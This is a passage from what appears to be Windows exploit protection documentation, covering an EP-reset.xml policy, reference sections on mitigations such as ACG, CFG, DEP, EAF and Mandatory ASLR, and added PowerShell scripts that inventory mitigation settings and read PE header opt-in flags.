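                # UseFilter means path-specific subkeys exist: one name can carry several policies.
                HasPathFilters    = [bool]$key.GetValue('UseFilter')
            }
        }
    }
}

Get-StoredProcessMitigation | Sort-Object Executable | Format-Table -AutoSize

# System-wide defaults live under the kernel key and are read at boot.
Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\kernel' |
    Select-Object MitigationOptions, MitigationAuditOptions |
    ForEach-Object {
        [pscustomobject]@{
            SystemMitigationOptions = ConvertTo-HexString $_.MitigationOptions
            SystemAuditOptions      = ConvertTo-HexString $_.MitigationAuditOptions
        }
    }
```

Run the inventory before and after deploying a configuration file: an executable that appears in the output but not in the XML you deploy is a leftover from an earlier policy, which is exactly the case the paragraph above warns about. For the decoded view of any listed entry, use Get-ProcessMitigation -Name with the executable name.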

To reset exploit protection settings using PowerShell, use the following command:

PowerShell

Set-ProcessMitigation -PolicyFilePath EP-reset.xml

Following is the EP-reset.xml distributed with the Windows Security Baselines:

XML

<?xml version="1.0" encoding="UTF-8"?>
<MitigationPolicy>
    <AppConfig Executable="ONEDRIVE.EXE">
        <DEP OverrideDEP="false" />
        <ASLR OverrideRelocateImages="false" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
        <ImageLoad OverrideBlockRemoteImages="false" />
    </AppConfig>
    <AppConfig Executable="firefox.exe">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
    </AppConfig>
    <AppConfig Executable="fltldr.exe">
        <DEP OverrideDEP="false" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
        <ImageLoad OverrideBlockRemoteImages="false" />
        <ChildProcess OverrideChildProcess="false" />
    </AppConfig>
    <AppConfig Executable="GROOVE.EXE">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
        <ImageLoad OverrideBlockRemoteImages="false" />
        <ChildProcess OverrideChildProcess="false" />
    </AppConfig>
    <AppConfig Executable="Acrobat.exe">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="AcroRd32.exe">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="chrome.exe">
        <DEP OverrideDEP="false" />
    </AppConfig>
    <AppConfig Executable="EXCEL.EXE">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="iexplore.exe">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="INFOPATH.EXE">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="java.exe">
        <DEP OverrideDEP="false" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="javaw.exe">
        <DEP OverrideDEP="false" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="javaws.exe">
        <DEP OverrideDEP="false" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="LYNC.EXE">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="MSACCESS.EXE">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="MSPUB.EXE">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="OIS.EXE">
        <DEP OverrideDEP="false" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="OUTLOOK.EXE">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="plugin-container.exe">
        <DEP OverrideDEP="false" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="POWERPNT.EXE">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="PPTVIEW.EXE">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="VISIO.EXE">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="VPREVIEW.EXE">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="WINWORD.EXE">
        <DEP OverrideDEP="false" />
        <ASLR ForceRelocateImages="true" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="wmplayer.exe">
        <DEP OverrideDEP="false" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
    <AppConfig Executable="wordpad.exe">
        <DEP OverrideDEP="false" />
        <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false"
                 OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false"
                 OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
    </AppConfig>
</MitigationPolicy>

Mitigation Reference
The following sections detail the protections provided by each exploit protection
mitigation, the compatibility considerations for the mitigation, and the configuration
options available.

Arbitrary code guard

Description
Arbitrary code guard helps protect against a malicious attacker loading the code of their
choice into memory through a memory safety vulnerability and being able to execute
that code.

Arbitrary code guard protects an application from executing dynamically generated code
(code that isn't loaded, for example, from the exe itself or a DLL). Arbitrary code guard
works by preventing memory from being marked as executable. When an application attempts
to allocate memory, the protection flags are checked. (Memory can be allocated with read,
write, and/or execute protection flags.) If the allocation attempts to include the execute
protection flag, the memory allocation fails and returns an error code
(STATUS_DYNAMIC_CODE_BLOCKED). Similarly, if an application attempts to change the
protection flags of memory that has already been allocated so that they include the
execute protection flag, the permission change fails and returns the same error code
(STATUS_DYNAMIC_CODE_BLOCKED).

By preventing the execute flag from being set, the data execution prevention feature of
Windows 10 and Windows 11 can then protect against the instruction pointer being set
to that memory and running that code.

Compatibility considerations
Arbitrary code guard prevents allocating any memory as executable, which presents a
compatibility issue with approaches such as Just-in-Time (JIT) compilers. Most modern
browsers, for example, compile JavaScript into native code in order to optimize
performance. In order to support this mitigation, they'll need to be rearchitected to
move the JIT compilation outside of the protected process. Other applications whose
design dynamically generates code from scripts or other intermediate languages are
similarly incompatible with this mitigation.

Configuration options
Allow thread opt-out - You can configure the mitigation to allow an individual thread to
opt-out of this protection. The developer must have written the application with
awareness of this mitigation, and have called the SetThreadInformation API with the
ThreadInformation parameter set to ThreadDynamicCodePolicy in order to be allowed
to execute dynamic code on this thread.

Audit only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Defender for Endpoint.
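Because mitigations stored in the registry only take effect when the program next starts, the configured state and the effective state of a running process can differ, and for ACG that difference matters for anything that JIT-compiles. The added example below (not part of the original article) compares the two for a named process. It assumes the ProcessMitigations module's -RunningProcesses switch and its DynamicCode.Enable, DynamicCode.Audit and DynamicCode.AllowThreadsToOptOut output properties, which mirror the XML attribute names; Get-AcgState is this example's own function name and msedge.exe is a placeholder.

```powershell
# Added example (not part of the original article): ACG as configured vs. as in effect.
# Assumptions: ProcessMitigations module present; property names follow its output.

function Get-AcgState {
    param([Parameter(Mandatory)][string]$ProcessName)   # e.g. 'msedge.exe'

    # What the registry says will apply to the next start of this executable.
    $stored = Get-ProcessMitigation -Name $ProcessName -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Scope        = 'Stored (next start)'
        Process      = $ProcessName
        Id           = $null
        Enforce      = $stored.DynamicCode.Enable               # ON / OFF / NOTSET
        Audit        = $stored.DynamicCode.Audit
        ThreadOptOut = $stored.DynamicCode.AllowThreadsToOptOut
    }

    # What each live instance is actually running with.
    Get-ProcessMitigation -Name $ProcessName -RunningProcesses -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Scope        = 'Running'
                Process      = $_.ProcessName
                Id           = $_.Id
                Enforce      = $_.DynamicCode.Enable
                Audit        = $_.DynamicCode.Audit
                ThreadOptOut = $_.DynamicCode.AllowThreadsToOptOut
            }
        }
}

Get-AcgState -ProcessName 'msedge.exe' | Format-Table -AutoSize
```

A "Stored" row showing ON while the "Running" rows show OFF simply means the process has not been restarted since the policy was written; a JIT-based application that keeps running with Enforce ON and no AuditDynamicCode events has usually been built to opt individual threads out, as described under Allow thread opt-out.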

Block low integrity images

Description
Block low integrity images prevents the application from loading files that are untrusted,
typically because they've been downloaded from the internet from a sandboxed
browser.

This mitigation blocks image loads if the image has an Access Control Entry (ACE) which
grants access to Low IL processes and which doesn't have a trust label ACE. It's
implemented by the memory manager, which blocks the file from being mapped into
memory. If an application attempts to map a low integrity image, it triggers a
STATUS_ACCESS_DENIED error. For details on how integrity levels work, see Mandatory
Integrity Control.

Compatibility considerations
Block low integrity images prevents the application from loading files that were
downloaded from the internet. If your application workflow requires loading images that
are downloaded, ensure that they're downloaded by a higher-trust process, or are explicitly
relabeled, before applying this mitigation.

Configuration options
Audit Only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.

Block remote images

Description
Blocking remote images helps to prevent the application from loading files that are
hosted on a remote device, such as a UNC share. Blocking remote images helps protect
against loading binaries into memory that are on an external device controlled by the
attacker.

This mitigation blocks image loads if the image is determined to be on a remote device.
It's implemented by the memory manager, which blocks the file from being mapped
into memory. If an application attempts to map a remote file, it triggers a
STATUS_ACCESS_DENIED error.

Compatibility considerations
Block remote images prevents the application from loading images from remote devices.
If your application loads files or plug-ins from remote devices, it isn't compatible with
this mitigation.

Configuration options
Audit Only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.

Block untrusted fonts

Description
Block untrusted fonts mitigates the risk of a flaw in font parsing leading to the attacker
being able to run code on the device. Only fonts that are installed into the
windows\fonts directory will be loaded for processing by GDI.

This mitigation is implemented within GDI, which validates the location of the file. If the
file isn't in the system fonts directory, the font won't be loaded for parsing and that call
will fail.

This mitigation is in addition to the built-in mitigation provided in Windows 10 1607
and later, and Windows 11, which moves font parsing out of the kernel and into a user-
mode app container. Any exploit based on font parsing, as a result, happens in a
sandboxed and isolated context, which reduces the risk significantly. For details on this
mitigation, see the blog Hardening Windows 10 with zero-day exploit mitigations.

Compatibility considerations
The most common use of fonts outside of the system fonts directory is with web fonts.
Modern browsers, such as Microsoft Edge, use DirectWrite instead of GDI, and aren't
impacted. However, legacy browsers, such as Internet Explorer 11 (and IE mode in the
new Microsoft Edge) can be impacted, particularly with applications such as Office 365,
which use font glyphs to display UI.

Configuration options
Audit Only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.

Code integrity guard

Description
Code integrity guard ensures that all binaries loaded into a process are digitally signed
by Microsoft. Code integrity guard includes WHQL (Windows Hardware Quality Labs)
signatures, which allows WHQL-approved drivers to run within the process.

This mitigation is implemented within the memory manager, which blocks the binary
from being mapped into memory. If you attempt to load a binary that isn't signed by
Microsoft, the memory manager returns the error STATUS_INVALID_IMAGE_HASH. By
blocking at the memory manager level, this prevents both binaries loaded by the
process and binaries injected into the process.

Compatibility considerations
This mitigation specifically blocks any binary that isn't signed by Microsoft. As such, it is
incompatible with most third-party software, unless that software is distributed by (and
digitally signed by) the Microsoft Store, and the option to allow loading of images
signed by the Microsoft Store is selected.

Configuration options
Also allow loading of images signed by Microsoft Store - Applications that are
distributed by the Microsoft Store are digitally signed by the Microsoft Store, and
adding this configuration allows binaries that have gone through the store certification
process to be loaded by the application.

Audit Only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.

Control flow guard (CFG)

Description
Control flow guard (CFG) mitigates the risk of attackers using memory corruption
vulnerabilities by protecting indirect function calls. For example, an attacker may use a
buffer overflow vulnerability to overwrite memory containing a function pointer, and
replace that function pointer with a pointer to executable code of their choice (which
may also have been injected into the program).

This mitigation is provided by injecting an additional check at compile time. Before each
indirect function call, additional instructions are added which verify that the target is a
valid call target before it's called. If the target isn't a valid call target, then the
application is terminated. As such, only applications that are compiled with CFG support
can benefit from this mitigation.

The check for a valid target is provided by the Windows kernel. When executable files
are loaded, the metadata for indirect call targets is extracted at load time and marked as
valid call targets. Additionally, when memory is allocated and marked as executable
(such as for generated code), these memory locations are also marked as valid call
targets, to support mechanisms such as JIT compilation.

Compatibility considerations
Since applications must be compiled to support CFG, they implicitly declare their
compatibility with it. Most applications, therefore, should work with this mitigation
enabled. Because these checks are compiled into the binary, the configuration you can
apply is merely to disable checks within the Windows kernel. In other words, the
mitigation is on by default, but you can configure the Windows kernel to always return
"yes" if you later determine that there's a compatibility issue that the application
developer didn't discover in their testing, which should be rare.

Configuration options
Use strict CFG - In strict mode, all binaries loaded into the process must be compiled for
Control Flow Guard (or have no executable code in them - such as resource dlls) in order
to be loaded.

Note

Control flow guard has no audit mode. Binaries are compiled with this mitigation
enabled.

Data Execution Prevention (DEP)

Description
Data execution prevention (DEP) prevents memory that wasn't explicitly allocated as
executable from being executed. DEP helps protect against an attacker injecting
malicious code into the process, such as through a buffer overflow, and then executing
that code.
If you attempt to set the instruction pointer to a memory address not marked as
executable, the processor throws an exception (general-protection violation), causing
the application to crash.

Compatibility considerations
All x64, ARM, and ARM-64 executables have DEP enabled by default, and it can't be
disabled. Since an application has never been executed without DEP, compatibility is
assumed.

All x86 (32-bit) binaries have DEP enabled by default, but DEP can be disabled per
process. Some old legacy applications, typically applications developed prior to
Windows XP SP2, might not be compatible with DEP. Such applications typically
generate code dynamically (for example, JIT compiling) or link to older libraries (such as
older versions of ATL) which dynamically generate code.

Configuration options
Enable ATL Thunk emulation - This configuration option disables ATL Thunk emulation.
ATL, the ActiveX Template Library, is designed to be as small and fast as possible. To
reduce binary size, it uses a technique called thunking. Thunking is typically thought of
for interacting between 32-bit and 16-bit applications, but there are no 16-bit
components to ATL here. Rather, to optimize for binary size, ATL stores machine code in
memory that isn't word-aligned (creating a smaller binary), and then invokes that code
directly. ATL components compiled with Visual Studio 7.1 or earlier (Visual Studio 2003)
don't allocate this memory as executable - thunk emulation resolves that compatibility
issue. Applications that have a binary extension model (such as Internet Explorer 11) will
often need to have ATL Thunk emulation enabled.

Disable extension points

Description
This mitigation disables various extension points for an application, which might be
used to establish persistence or elevate privileges of malicious content.

This includes:

AppInit DLLs - Whenever a process starts, the system loads the specified DLL into
the context of the newly started process before calling its entry point function.
Details on AppInit DLLs can be found here. With this mitigation applied, AppInit
DLLs aren't loaded. Beginning with Windows 7, AppInit DLLs need to be digitally
signed, as described here. Additionally, beginning with Windows 8, AppInit DLLs
won't be loaded if SecureBoot is enabled, as described here.
Legacy IMEs - An Input Method Editor (IME) allows a user to type text in a
language that has more characters than can be represented on a keyboard. Third
parties are able to create IMEs. A malicious IME might obtain credentials or other
sensitive information from this input capture. Some IMEs, referred to as Legacy
IMEs, only work on Windows Desktop apps, and not UWP apps. This mitigation
also prevents this legacy IME from loading into the specified Windows Desktop
app.
Windows Event Hooks - An application can call the SetWinEventHook API to
register interest in an event taking place. A DLL is specified and can be injected
into the process. This mitigation forces the hook to be posted to the registering
process rather than running in-process through an injected DLL.

Compatibility considerations
Most of these extension points are relatively infrequently used, so compatibility impact
is typically small, particularly at an individual application level. The one consideration is if
users are using third-party Legacy IMEs that won't work with the protected application.

Configuration options
There are no configuration options for this mitigation.

Note

Disable extension points has no audit mode.

Disable Win32k system calls

Description
Win32k.sys provides a broad attack surface for an attacker. As a kernel-mode
component, it's frequently targeted as an escape vector for applications that are
sandboxed. This mitigation prevents calls into win32k.sys by blocking a thread from
converting itself into a GUI thread, which is then given access to invoke Win32k
functions. A thread is non-GUI when created, but converted on first call to win32k.sys, or
through an API call to IsGuiThread.

Compatibility considerations
This mitigation is designed for processes that are dedicated non-UI processes. For
example, many modern browsers use process isolation and incorporate non-UI
processes. Any application that displays a GUI using a single process will be impacted by
this mitigation.

Configuration options
Audit Only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.

Don't allow child processes

Description
This mitigation prevents an application from creating new child applications. A common
technique used by adversaries is to initiate a trusted process on the device with
malicious input (a "living off the land" attack), which often requires launching another
application on the device. If there are no legitimate reasons why an application would
launch a child process, this mitigation mitigates that potential attack vector. The
mitigation is applied by setting a property on the process token, which blocks creating a
token for the child process with the error message STATUS_CHILD_PROCESS_BLOCKED.

Compatibility considerations
If your application launches child applications for any reason, such as supporting
hyperlinks that launch a browser or an external browser, or which launch other utilities
on the computer, this functionality will be broken with this mitigation applied.

Configuration options
Audit Only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.

Export address filtering

Description
Export address filtering (EAF) mitigates the risk of malicious code looking at the export
address table of all loaded modules to find modules that contain useful APIs for their
attack. This is a common tactic used by shellcode. In order to mitigate the risk of such
an attack, this mitigation protects three commonly attacked modules:

ntdll.dll
kernelbase.dll
kernel32.dll

The mitigation protects the memory page in the export directory that points to the
export address table. This memory page will have the PAGE_GUARD protection applied
to it. When someone tries to access this memory, it generates a
STATUS_GUARD_PAGE_VIOLATION. The mitigation handles this exception, and if the
accessing instruction doesn't pass validation, the process is terminated.

Compatibility considerations
This mitigation is primarily an issue for applications such as debuggers, sandboxed
applications, applications using DRM, or applications that implement anti-debugging
technology.

Configuration options
Validate access for modules that are commonly abused by exploits - This option, also
known as EAF+, adds protections for other commonly attacked modules:

mshtml.dll
flash*.ocx
jscript*.ocx
vbscript.dll
vgx.dll
mozjs.dll
xul.dll
acrord32.dll
acrofx32.dll
acroform.api

Additionally, by enabling EAF+, this mitigation adds the PAGE_GUARD protection to the
page containing the "MZ" header, the first two bytes of the DOS header in a PE file,
which is another aspect of known memory content which shellcode can look for to
identify modules potentially of interest in memory.

Audit Only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.

Force randomization for images (Mandatory ASLR)

Description
Address Space Layout Randomization (ASLR) mitigates the risk of an attacker using their
knowledge of the memory layout of the system in order to execute code that is already
present in process memory and already marked as executable. This can mitigate the risk
of an attacker using techniques such as return-to-libc attacks, where the adversary sets
the context and then modifies the return address to execute existing code with context
that suits the adversary's purpose.

Mandatory ASLR forces a rebase of all DLLs within the process. A developer can enable
ASLR using the /DYNAMICBASE linker option, and this mitigation has the same effect.

When the memory manager is mapping in the image into the process, Mandatory ASLR
will forcibly rebase DLLs and EXEs that haven't opted in to ASLR. Note, however, that this
rebasing has no entropy, and can therefore be placed at a predictable location in
memory. For rebased and randomized location of binaries, this mitigation should be
paired with Randomize memory allocations (Bottom-up ASLR).

Compatibility considerations
The compatibility impact of ASLR is typically constrained to older applications that were
built using compilers that made assumptions about the base address of a binary file or
have stripped out base relocation information. This can lead to unpredictable errors as
the execution flow attempts to jump to the expected, rather than the actual, location in
memory.

Configuration options
Do not allow stripped images - This option blocks the loading of images that have had
relocation information stripped. The Windows PE file format contains absolute
addresses, and the compiler also generates a base relocation table that the loader can
use to find all relative memory references and their offset, so they can be updated if the
binary doesn't load at its preferred base address. Some older applications strip out this
information in production builds, and therefore these binaries can't be rebased. This
mitigation blocks such binaries from being loaded (instead of allowing them to load at
their preferred base address).

Note

Force randomization for images (Mandatory ASLR) has no audit mode.
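Before enabling Mandatory ASLR, Do not allow stripped images, DEP or Strict CFG for an application, a practitioner wants to know which of its binaries opted in at link time (/DYNAMICBASE, /NXCOMPAT, CFG) and which have had their relocations stripped. The following PowerShell script is an added example, not part of the Microsoft documentation; it reads those flags directly from the PE headers, and the application folder at the end is a placeholder.

```powershell
# Added example (not from the Microsoft docs): report the exploit-protection opt-ins a
# binary carries in its PE headers. Offsets and flag values are from the PE/COFF format:
# DOS header 'MZ', e_lfanew at 0x3C, 'PE\0\0' signature, 20-byte COFF header, then the
# optional header whose DllCharacteristics field sits at offset 70 in PE32 and PE32+.
function Get-PeMitigationOptIn {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Path)

    $bytes = [System.IO.File]::ReadAllBytes($Path)
    if ($bytes.Length -lt 0x40 -or $bytes[0] -ne 0x4D -or $bytes[1] -ne 0x5A) {
        throw "$Path is not a PE file (no MZ header)"
    }
    $peOffset = [BitConverter]::ToInt32($bytes, 0x3C)
    if ([BitConverter]::ToUInt32($bytes, $peOffset) -ne 0x00004550) {   # 'PE\0\0'
        throw "$Path has an invalid PE signature"
    }
    $coff     = $peOffset + 4                                  # IMAGE_FILE_HEADER
    $fileChar = [BitConverter]::ToUInt16($bytes, $coff + 18)   # Characteristics
    $optional = $coff + 20                                     # IMAGE_OPTIONAL_HEADER
    $magic    = [BitConverter]::ToUInt16($bytes, $optional)    # 0x10B = PE32, 0x20B = PE32+
    $dllChar  = [BitConverter]::ToUInt16($bytes, $optional + 70)

    [PSCustomObject]@{
        Path           = $Path
        Is64Bit        = ($magic -eq 0x20B)
        RelocsStripped = [bool]($fileChar -band 0x0001)   # IMAGE_FILE_RELOCS_STRIPPED: cannot be rebased
        DynamicBase    = [bool]($dllChar  -band 0x0040)   # DYNAMIC_BASE: linked with /DYNAMICBASE (ASLR)
        HighEntropyVA  = [bool]($dllChar  -band 0x0020)   # HIGH_ENTROPY_VA: 64-bit high-entropy ASLR
        NxCompat       = [bool]($dllChar  -band 0x0100)   # NX_COMPAT: linked with /NXCOMPAT (DEP)
        GuardCF        = [bool]($dllChar  -band 0x4000)   # GUARD_CF: compiled with Control Flow Guard
        NoSeh          = [bool]($dllChar  -band 0x0400)   # NO_SEH: image registers no SEH handlers
    }
}

# Usage: inventory an application's images and list the ones that Mandatory ASLR would
# have to rebase (no DYNAMIC_BASE), that "Do not allow stripped images" would refuse to
# load (RelocsStripped), or that Strict CFG would reject (no GUARD_CF).
# 'C:\Program Files\ExampleApp' is a placeholder path.
Get-ChildItem 'C:\Program Files\ExampleApp' -Recurse -Include *.exe, *.dll |
    ForEach-Object { Get-PeMitigationOptIn -Path $_.FullName } |
    Where-Object { -not $_.DynamicBase -or $_.RelocsStripped -or -not $_.GuardCF } |
    Format-Table Path, Is64Bit, DynamicBase, RelocsStripped, NxCompat, GuardCF -AutoSize
```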

Hardware-enforced stack protection

Description
Hardware-enforced stack protection offers robust protection against ROP exploits since
it maintains a record of the intended execution flow of a program. To ensure smooth
ecosystem adoption and application compatibility, Windows will offer this protection as
an opt-in model, so developers can receive this protection at their own pace.

Compatibility considerations
Hardware-enforced stack protection will only work on chipsets with support for
hardware shadow stacks, Intel's Control-flow Enforcement Technology (CET) or AMD
shadow stacks.

Configuration options
Audit only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Defender for Endpoint.

Enforce for all modules instead of Compatible modules - You can enable this
mitigation to Enforce for all modules instead of Compatible modules.

Import address filtering (IAF)

Description
The import address filtering (IAF) mitigation helps mitigate the risk of an adversary
changing the control flow of an application by modifying the import address table (IAT)
to redirect to arbitrary code of the attacker's choice when that function is called. An
attacker could use this approach to hijack control, or to intercept, inspect, and
potentially block calls to sensitive APIs.

The memory pages for all protected APIs have the PAGE_GUARD protection applied to
them. When someone tries to access this memory, it generates a
STATUS_GUARD_PAGE_VIOLATION. The mitigation handles this exception, and if the
accessing instruction doesn't pass validation, the process is terminated.

This mitigation protects the following Windows APIs:

GetProcAddress
GetProcAddressForCaller
LoadLibraryA
LoadLibraryExA
LoadLibraryW
LoadLibraryExW
LdrGetProcedureAddress
LdrGetProcedureAddressEx
LdrGetProcedureAddressForCaller
LdrLoadDll
VirtualProtect
VirtualProtectEx
VirtualAlloc
VirtualAllocEx
NtAllocateVirtualMemory
NtProtectVirtualMemory
CreateProcessA
CreateProcessW
WinExec
CreateProcessAsUserA
CreateProcessAsUserW
GetModuleHandleA
GetModuleHandleW
RtlDecodePointer
DecodePointer

Compatibility considerations
Legitimate applications that perform API interception may be detected by this
mitigation and cause some applications to crash. Examples include security software and
application compatibility shims.

Configuration options
Audit Only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.

Randomize memory allocations (Bottom-up ASLR)

Description
